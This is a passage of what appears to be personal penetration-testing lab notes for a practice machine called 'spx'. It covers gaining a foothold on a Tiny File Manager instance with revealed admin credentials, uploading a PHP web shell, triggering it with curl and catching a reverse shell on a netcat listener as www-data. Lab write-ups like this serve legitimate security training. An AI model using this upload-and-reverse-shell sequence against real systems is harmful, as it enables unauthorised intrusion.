RCE
The credential of the admin user for the target Tiny File Manager instance has been revealed.
/Practice/SPX/3-Exploitation/attachments/{4DC6A550-1028-4268-B9FE-C71FA90F283A}.png)
/Practice/SPX/3-Exploitation/attachments/{1071FF15-D368-4E10-9240-FAB5D304E3C4}.png)
Successfully authenticated
Arbitrary File Upload
/Practice/SPX/3-Exploitation/attachments/{EF521CB3-E69B-4EF3-A121-E85CC222AB51}.png)
Uploading the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ curl http://$IP/shell.phpInvoking..
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.108] 57700
SOCKET: Shell has connected! PID: 1944
whoami
www-data
hostname
spx
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:f4:ea brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.138.108/24 brd 192.168.138.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via arbitrary file upload to the target Tiny File Manager instance.